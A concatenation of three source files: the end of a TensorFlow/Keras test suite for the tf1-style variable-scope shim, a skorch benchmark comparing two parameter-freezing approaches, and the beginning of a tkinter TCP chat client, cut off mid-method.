with tf.compat.v1.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReuseScopeWithoutNameScopeCollision(self):
# Github issue: #13429
with self.cached_session():
with tf.compat.v1.variable_scope("outer"):
with tf.compat.v1.variable_scope("inner") as inner:
pass
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with tf.name_scope(scope.original_name_scope):
self.assertEqual(
tf.compat.v1.get_variable("w", []).name, "outer/inner/w:0")
with tf.compat.v1.variable_scope("another"):
with tf.compat.v1.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with tf.name_scope(scope1.original_name_scope):
self.assertEqual(
tf.compat.v1.get_variable("w1", []).name,
"outer/inner/w1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVarWithDevice(self):
g = tf.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with tf.compat.v1.device(device_func):
_ = tf.compat.v1.get_variable("x", (100, 200))
_ = tf.compat.v1.get_variable(
"y", dtype=tf.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", tf.float32))
self.assertEqual(varname_type[1], ("y", tf.int64))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithRefDtype(self):
v = tf.compat.v1.get_variable("v", shape=[3, 4], dtype=tf.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = tf.compat.v1.get_variable("w", shape=[5, 6], dtype=v.dtype)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesNoArgs(self):
v = tf.compat.v1.get_variable("foo", initializer=lambda: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithInitializerWhichTakesOptionalArgs(self):
v = tf.compat.v1.get_variable("foo", initializer=lambda x=True: [2])
self.assertEqual(v.name, "foo:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoGraphs(self):
def f():
g1 = tf.Graph()
g2 = tf.Graph()
with g1.as_default():
with g2.as_default():
with tf.compat.v1.variable_scope("_"):
pass
self.assertRaisesRegex(ValueError, "'_' is not a valid scope name", f)
class VariableScopeWithCustomGetterTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNonCallableGetterFails(self):
with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
with tf.compat.v1.variable_scope("scope0", custom_getter=3):
tf.compat.v1.get_variable("name0")
with self.assertRaisesRegex(ValueError, r"custom_getter .* not callable:"):
tf.compat.v1.get_variable("name0", custom_getter=3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with tf.compat.v1.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope(scope, reuse=True):
v2 = tf.compat.v1.get_variable("v", [1])
with tf.compat.v1.variable_scope("new_scope") as new_scope:
v3 = tf.compat.v1.get_variable("v3", [1])
with tf.compat.v1.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = tf.compat.v1.get_variable("v3", [1])
self.assertIs(v, v2)
self.assertIs(v3, v4)
self.assertEqual(3, called[0]) # skipped one in the first new_scope
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSynchronizationAndAggregationWithCustomGetter(self):
called = [0]
synchronization = tf.VariableSynchronization.AUTO
aggregation = tf.compat.v1.VariableAggregation.NONE
def custom_getter(getter, *args, **kwargs):
called[0] += 1
# Verify synchronization and aggregation kwargs are as expected.
self.assertEqual(kwargs["synchronization"], synchronization)
self.assertEqual(kwargs["aggregation"], aggregation)
return getter(*args, **kwargs)
with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
tf.compat.v1.get_variable("v", [1])
self.assertEqual(1, called[0])
with tf.compat.v1.variable_scope("scope", custom_getter=custom_getter):
synchronization = tf.VariableSynchronization.ON_READ
aggregation = tf.compat.v1.VariableAggregation.MEAN
tf.compat.v1.get_variable(
"v1", [1], synchronization=synchronization, aggregation=aggregation)
self.assertEqual(2, called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreator(self):
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with tf.variable_creator_scope(creator_a):
with tf.variable_creator_scope(creator_b):
tf.compat.v1.Variable(1.0, name="one_name")
self.assertEqual(variable_names[0], "forced_name")
called = [False]
def creator_c(next_creator, **kwargs):
called[0] = True
self.assertEqual(kwargs["synchronization"],
tf.VariableSynchronization.ON_WRITE)
self.assertEqual(kwargs["aggregation"],
tf.compat.v1.VariableAggregation.MEAN)
return next_creator(**kwargs)
with tf.variable_creator_scope(creator_c):
tf.compat.v1.get_variable(
"v", [],
synchronization=tf.VariableSynchronization.ON_WRITE,
aggregation=tf.compat.v1.VariableAggregation.MEAN)
self.assertTrue(called[0])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVariableCreatorNestingError(self):
def creator(next_creator, **kwargs):
return next_creator(**kwargs)
# Save the state so we can clean up at the end.
graph = tf.compat.v1.get_default_graph()
old_creator_stack = graph._variable_creator_stack
try:
scope = tf.variable_creator_scope(creator)
scope.__enter__()
with tf.variable_creator_scope(creator):
with self.assertRaises(RuntimeError):
scope.__exit__(None, None, None)
finally:
graph._variable_creator_stack = old_creator_stack
class VariableScopeMultithreadedTest(tf.test.TestCase):
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with tf.compat.v1.variable_scope(main_thread_scope):
with tf.compat.v1.variable_scope("foo"):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with tf.compat.v1.variable_scope("bar"):
v = tf.compat.v1.get_variable("v", [])
self.assertEqual("bar/v:0", v.name)
graph = tf.compat.v1.get_default_graph()
with tf.compat.v1.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()
class CompatV1TemplateScaleByY(variable_scope_shim.VariableScopeLayer):
def __init__(self, **kwargs):
super().__init__(**kwargs)
def my_op(x, scalar_name):
var1 = tf.compat.v1.get_variable(
scalar_name,
shape=[],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.constant_initializer(1.5))
return x * var1
self.scale_by_y = tf.compat.v1.make_template(
"scale_by_y", my_op, scalar_name="y")
def forward_pass(self, inputs):
with tf.compat.v1.variable_scope("foo"):
return self.scale_by_y(inputs)
class VariableScopeModule(tf.Module):
"""Module that uses the shim."""
@variable_scope_shim.track_tf1_style_variables
def __call__(self, *args, **kwargs):
with self.name_scope:
return self.forward_pass(*args, **kwargs)
def get_compat_v1_regularization_losses(self):
"""Dict w/ regularization losses from `get_variable`&`compat.v1.layers`."""
return {name: regularizer() for name, regularizer
in self._tf1_style_var_store._regularizers.items()} # pylint: disable=protected-access
@combinations.generate(combinations.combine(mode=["eager"]))
class TF1VariableScopeLayerTest(tf.test.TestCase, parameterized.TestCase):
def test_get_variable(self):
# Test the shim when using `get_variable` (and regularizers) directly
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = inputs
with tf.compat.v1.variable_scope("dense_one"):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
with tf.compat.v1.variable_scope("nested_scope"):
with tf.compat.v1.variable_scope("dense_two"):
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, regularization losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(layer.losses), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(layer.losses), 6)
def test_compat_v1_layer(self):
# Test the shim when using `compat.v1` layers
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs, self.units, name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out, self.units, name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(layer.losses), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(layer.losses), 6)
def test_shim_exporting(self):
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs,
self.units,
name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out,
self.units,
name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
layer(tf.ones(shape=(5, 5)))
tmp_dir = self.get_temp_dir()
tf.saved_model.save(layer, tmp_dir)
def test_module_get_variable(self):
# Test the module shim when using `get_variable` (and regularizers) directly
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = inputs
with tf.compat.v1.variable_scope("dense_one"):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
with tf.compat.v1.variable_scope("nested_scope"):
with tf.compat.v1.variable_scope("dense_two"):
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.zeros_initializer(),
name="bias")
out = tf.matmul(out, kernel)
out = tf.nn.bias_add(out, bias)
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, regularization losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(
tf.add_n(layer.get_compat_v1_regularization_losses().values()), 6)
def test_module_compat_v1_layer(self):
# Test the module shim when using `compat.v1` layers
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
out = core_layers.dense(
inputs, self.units, name="dense_one",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
with tf.compat.v1.variable_scope("nested_scope"):
out = core_layers.dense(
out, self.units, name="dense_two",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return out
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense_one/bias:0",
"dense_one/kernel:0",
"nested_scope/dense_two/bias:0",
"nested_scope/dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 50)
self.assertAllEqual(tf.add_n(
layer.get_compat_v1_regularization_losses().values()), 1.5)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(5, 10)) * 2)
weights["nested_scope/dense_two/kernel:0"].assign(
tf.ones(shape=(10, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 200)
self.assertAllEqual(tf.add_n(
layer.get_compat_v1_regularization_losses().values()), 6)
def test_shim_nesting(self):
# Test that nesting the shim in itself works
class NestedLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, name, *args, **kwargs):
super().__init__(*args, name=name, **kwargs)
self.units = units
def forward_pass(self, inputs):
out = inputs
with tf.compat.v1.variable_scope(self.name):
# The weights are created with a `regularizer`,
# so the layer should track their regularization losses
kernel = tf.compat.v1.get_variable(
shape=[out.shape[-1], self.units],
regularizer=regularizers.L2(1.0),
initializer=tf.compat.v1.ones_initializer(),
name="kernel")
bias = tf.compat.v1.get_variable(
shape=[self.units,],
initializer=tf.compat.v1.initializers.zeros,
name="bias")
out = tf.linalg.matmul(out, kernel)
out = tf.compat.v1.nn.bias_add(out, bias)
return out
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self.dense_layer_a = None
self.dense_layer_b = None
def forward_pass(self, inputs):
# Only create the nested tf.variable/module/layer/model if it has not
# already been created!
if not self.dense_layer_a:
self.dense_layer_a = NestedLayer(self.units * 2, "dense_one")
out = self.dense_layer_a(inputs)
if not self.dense_layer_b:
self.dense_layer_b = NestedLayer(self.units, "dense_two")
out = self.dense_layer_b(out)
return out
layer = WrappedDenseLayer(5)
out = layer(tf.ones(shape=(1, 3)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
# (Specifically: no double-counting of any weights or reg. losses
# between nested components!)
self.assertEqual({var.name for var in layer.trainable_weights},
{"dense_one/bias:0",
"dense_one/kernel:0",
"dense_two/bias:0",
"dense_two/kernel:0"})
self.assertEqual({var.name for var in layer.dense_layer_a.weights},
{"dense_one/bias:0",
"dense_one/kernel:0"})
self.assertEqual({var.name for var in layer.dense_layer_b.weights},
{"dense_two/bias:0",
"dense_two/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 30)
self.assertAllEqual(tf.add_n(layer.dense_layer_a.losses), 30)
self.assertAllEqual(tf.add_n(layer.dense_layer_b.losses), 50)
self.assertAllEqual(tf.add_n(layer.losses), 80)
# Verify reuse by updating the variables then re-running
weights["dense_one/kernel:0"].assign(tf.ones(shape=(3, 10)) * 2)
weights["dense_two/kernel:0"].assign(
tf.ones(shape=(10, 5)) * 2)
out = layer(tf.ones(shape=(1, 3)))
self.assertAllEqual(out, tf.ones(shape=(1, 5)) * 120)
self.assertAllEqual(tf.add_n(layer.losses), 320)
def test_compat_v1_make_template_in_shim_eager(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly in eager
layer = CompatV1TemplateScaleByY()
for _ in range(3):
# Use multiple calls to verify that no new weights get created
self.assertAllEqual(layer(tf.ones(shape=(2, 3))),
tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual({var.name: var for var in layer.weights},
{"foo/scale_by_y/y:0": 1.5})
self.assertAllEqual(tf.add_n(layer.losses),
regularizers.L2()(layer.weights[0]))
def test_compat_v1_make_template_in_shim_tf_function(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly in a tf.function
# when made outside the function
layer = CompatV1TemplateScaleByY()
@tf.function
def foo(x):
return layer(x), tf.add_n(layer.losses)
for _ in range(3):
# Use multiple calls to verify that no new weights get created
out, loss = foo(tf.ones(shape=(2, 3)))
self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual(loss, regularizers.L2()(layer.weights[0]))
self.assertAllEqual({var.name: var for var in layer.weights},
{"foo/scale_by_y/y:0": 1.5})
def test_compat_v1_make_template_in_trace_in_shim(self):
# Test the shim when using `compat.v1.make_template`
# Verify it works correctly when the make_template/layer/shim
# is created on the first tf.function trace!
layers = {}
@tf.function
def bar(x):
if "layer" not in layers:
layers["layer"] = CompatV1TemplateScaleByY()
layer = layers["layer"]
return layer(x), tf.add_n(layer.losses)
for _ in range(3):
# Use multiple calls to verify that no new weights get created
out, loss = bar(tf.ones(shape=(2, 3)))
self.assertAllEqual(out, tf.constant(1.5, shape=(2, 3)))
self.assertAllEqual(loss, regularizers.L2()(layers["layer"].weights[0]))
self.assertAllEqual({var.name: var for var in layers["layer"].weights},
{"foo/scale_by_y/y:0": 1.5})
def test_only_track_get_variable(self):
# Test that the shim does not try to track or reuse variables
# that were not created by get_variable. These variables/modules/layers
# need to be tracked separately.
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
return dense_layer(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
self.assertEmpty(layer.weights)
def test_embedded_keras_model(self):
# Test the shim when embedding a Keras model inside of it
# and assigning the model to an attribute
class WrappedDenseLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
if not self._dense_model:
inp = input_layer_module.Input(shape=inputs.shape)
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
self._dense_model = training_module.Model(
inputs=inp, outputs=dense_layer(inp))
return self._dense_model(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense/bias:0",
"dense/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
self.assertAllEqual(tf.add_n(layer.losses), 0.5)
# Verify reuse by updating the variables then re-running
weights["dense/kernel:0"].assign(
tf.ones(shape=(5, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
self.assertAllEqual(tf.add_n(layer.losses), 2)
def test_embedded_keras_model_in_module(self):
# Test the module shim when embedding a Keras model inside of it
# and assigning the model to an attribute
class WrappedDenseLayer(VariableScopeModule):
def __init__(self, units, **kwargs):
super().__init__(**kwargs)
self.units = units
self._dense_model = None
def forward_pass(self, inputs):
if not self._dense_model:
inp = input_layer_module.Input(shape=inputs.shape)
dense_layer = core.Dense(
self.units, name="dense",
kernel_initializer=tf.compat.v1.ones_initializer(),
kernel_regularizer="l2")
self._dense_model = training_module.Model(
inputs=inp, outputs=dense_layer(inp))
return self._dense_model(inputs)
layer = WrappedDenseLayer(10)
out = layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct output, losses, + variables were made
self.assertEqual(weights.keys(), {"dense/bias:0",
"dense/kernel:0"})
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 5)
# The module shim will only track regularization losses made by
# compat.v1.layers and compat.v1.get_variable. Other regularization
# losses must be tracked by separate user-created mechanisms.
self.assertEmpty(layer.get_compat_v1_regularization_losses())
# Verify reuse by updating the variables then re-running
weights["dense/kernel:0"].assign(
tf.ones(shape=(5, 10)) * 2)
out = layer(tf.ones(shape=(5, 5)))
self.assertAllEqual(out, tf.ones(shape=(5, 10)) * 10)
# The module shim will only track regularization losses made by
# compat.v1.layers and compat.v1.get_variable. Other regularization
# losses must be tracked by separate user-created mechanisms.
self.assertEmpty(layer.get_compat_v1_regularization_losses())
def test_training_arg(self):
# Test the shim when passing in a Keras `training` arg
class TrainingCheckLayer(variable_scope_shim.VariableScopeLayer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.units = units
def forward_pass(self, inputs, training=None):
if training:
out = core_layers.dense(inputs, self.units, name="dense_training")
else:
out = core_layers.dense(inputs, self.units, name="dense_no_training")
return out
layer = TrainingCheckLayer(10)
layer(tf.ones(shape=(5, 5)), training=True)
weights = {x.name: x for x in layer.variables}
# Verify the correct variables were made
self.assertEqual(weights.keys(),
{"dense_training/bias:0", "dense_training/kernel:0"})
layer = TrainingCheckLayer(10)
layer(tf.ones(shape=(5, 5)))
weights = {x.name: x for x in layer.variables}
# Verify the correct variables were made
self.assertEqual(weights.keys(),
{"dense_no_training/bias:0", "dense_no_training/kernel:0"})
def test_incorrect_decoration(self):
# Raise an error if you incorrectly decorate a method
# that is not a method of a Module, layer, or model:
@variable_scope_shim.track_tf1_style_variables
def foo(x):
return x * 2
with self.assertRaisesRegex(ValueError, "does not extend"):
foo(tf.ones(shape=(4, 4)))
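# Illustrative sketch (an assumption added for readers, not part of the
# original test suite): the decorator above is intended for methods of classes
# that extend tf.Module or a Keras layer/model, where tf1-style get_variable
# calls are then tracked and reused across calls, e.g.:
class _ExampleScaleByW(tf.Module):
  @variable_scope_shim.track_tf1_style_variables
  def __call__(self, inputs):
    with tf.compat.v1.variable_scope("scale_by_w"):
      w = tf.compat.v1.get_variable(
          "w", shape=(), initializer=tf.compat.v1.ones_initializer())
      return inputs * w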
if __name__ == "__main__":
tf.test.main()
|
freezing.py
|
"""Benchmark to test runtime and memory performance of
different freezing approaches.
Test A is done by setting `requires_grad=False` manually
while filtering these parameters from the optimizer using
``skorch.helper.filtered_optimizer``.
Test B uses the ``Freezer`` via ``ParamMapper`` without
explicitly removing the parameters from the optimizer.
In theory there should be no difference in memory
consumption and runtime.
"""
from functools import partial
import resource
from multiprocessing import Process, Queue
import torch
import scripts.study_case.ID_12.skorch as skorch  # alias so the skorch.* calls below resolve
import scripts.study_case.ID_12.skorch.helper
from scripts.study_case.ID_12.skorch.toy import make_classifier
import sklearn.datasets
import numpy as np
X, y = sklearn.datasets.make_classification(
n_samples=1000,
n_features=2,
n_informative=2,
n_redundant=0,
n_classes=2,
random_state=0)
X = X.astype('float32')
y = y.astype('int64')
N_LAYERS = 2
make_module_cls = partial(
make_classifier,
num_hidden=N_LAYERS,
input_units=2,
hidden_units=100,
output_units=2,
)
linear_idcs = list(range(0, (N_LAYERS+1)*3, 3))
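# linear_idcs above presumably indexes the Linear modules of the generated
# sequential (every third entry, assuming make_classifier stacks
# Linear/nonlinearity/dropout blocks); only the last Linear layer is left
# unfrozen in the tests below.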
np.random.seed(0)
torch.manual_seed(0)
def test_a():
# -- first by stripping parameters explicitly
np.random.seed(0)
torch.manual_seed(0)
print('1', end='')
mod = make_module_cls()()
# freeze all params but last layer
for i in linear_idcs[:-1]:
skorch.utils.freeze_parameter(mod.sequential[i].weight)
skorch.utils.freeze_parameter(mod.sequential[i].bias)
opt = skorch.helper.filtered_optimizer(
torch.optim.SGD,
skorch.helper.filter_requires_grad)
net = skorch.NeuralNetClassifier(
mod,
verbose=0,
optimizer=opt,
warm_start=True)
for i in linear_idcs[:-1]:
assert not mod.sequential[i].weight.requires_grad
net.fit(X, y)
for i in linear_idcs[:-1]:
assert not mod.sequential[i].weight.requires_grad
assert not net.module_.sequential[i].weight.requires_grad
rss = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
return rss, net.history[-1, 'valid_loss'], np.mean(net.history[:, 'dur'])
def test_b():
# -- second by simply freezing them
np.random.seed(0)
torch.manual_seed(0)
print('2', end='')
mod = make_module_cls()()
opt = torch.optim.SGD
cb = skorch.callbacks.Freezer(
['sequential.{}.weight'.format(i) for i in linear_idcs[:-1]] +
['sequential.{}.bias'.format(i) for i in linear_idcs[:-1]]
)
net = skorch.NeuralNetClassifier(
mod,
verbose=0,
optimizer=opt,
callbacks=[cb])
net.fit(X, y)
for i in linear_idcs[:-1]:
assert not mod.sequential[i].weight.requires_grad
assert not net.module_.sequential[i].weight.requires_grad
rss = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
return rss, net.history[-1, 'valid_loss'], np.mean(net.history[:, 'dur'])
def test_runner(q, fn, n_runs):
q.put(np.mean([fn() for _ in range(n_runs)], axis=0))
def test_forker(test_fn, n_runs):
q = Queue()
p = Process(target=test_runner, args=(q, test_fn, n_runs))
p.start()
res = q.get()
p.join()
return res
if __name__ == '__main__':
n_runs = 10
print(f'running tests for {n_runs} runs each.')
# We fork the tests so that each has its own process and thus its
# own memory allocation. Therefore tests don't influence each other.
dur_a = test_forker(test_a, n_runs)
print()
dur_b = test_forker(test_b, n_runs)
print()
print(f'test_a: µ_rss = {dur_a[0]}, µ_valid_loss = {dur_a[1]}, µ_dur={dur_a[2]}')
    print(f'test_b: µ_rss = {dur_b[0]}, µ_valid_loss = {dur_b[1]}, µ_dur={dur_b[2]}')
# valid losses must be identical
assert np.allclose(dur_a[1], dur_b[1])
# memory usage should be nearly identical (within 4MiB)
assert np.allclose(dur_a[0], dur_b[0], atol=4*1024**2)
# duration should be nearly identical
assert np.allclose(dur_a[2], dur_b[2], atol=0.5)
|
TCPclient.py
|
from socket import *
import tkinter as tk
import tkinter.scrolledtext as tst
import time
import tkinter.messagebox
import threading
# Dialog class for entering the server IP address
class inputIPdialog(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self,master)
self.ipInput=tk.Text(self,width=30,height=5)
self.ipInput.grid(row=0,column=0,columnspan=3)
        self.okbtn=tk.Button(self,text='OK',command=self.setIP).grid(row=1,column=3)
self.grid()
def setIP(self):
        # Making this a class attribute instead of a global did not work; the reason is unclear
global servername
servername=self.ipInput.get('1.0','end-1c')
        # Destroy the dialog window
ipRootFrame.destroy()
class Application(tk.Frame):
def __init__(self,master):
tk.Frame.__init__(self,master)
self.grid()
self.createWidgets()
def createWidgets(self):
        # Chat history display
self.textEdit=tst.ScrolledText(self,width=50,height=15)
self.textEdit.grid(row=0,column=0,rowspan=1,columnspan=4)
self.textEdit.config(state='disabled')
        # Define tags that change the font color
self.textEdit.tag_config('server',foreground='red')
self.textEdit.tag_config('guest',foreground='blue')
        # Message input box
self.inputText=tk.Text(self,width=40,height=5)
self.inputText.grid(row=1,column=0,columnspan=1)
        # Bind a shortcut: pressing Enter sends the message
self.inputText.bind("<KeyPress-Return>",self.textSendReturn)
        # Send button
self.btnSend=tk.Button(self,text='send',command=self.textSend)
self.btnSend.grid(row=1,column=3)
        # Start a thread that receives messages and displays them in the chat window
t=threading.Thread(target=self.getInfo)
t.start()
    def textSend(self):
        # Get the full contents of the Text widget
        #https://stackoverflow.com/questions/14824163/how-to-get-the-input-from-the-tkinter-text-box-widget
        msg=self.inputText.get('1.0','end-1c')
        if msg!="" and msg is not None:
            # Show the send time and the outgoing message
            timemsg='Client '+time.strftime('%Y-%m-%d %H:%M:%S',time.localtime())+'\n'
            # Make textEdit editable by setting its state attribute
            self.textEdit.config(state='normal')
            self.textEdit.insert(tk.INSERT,timemsg,'guest')
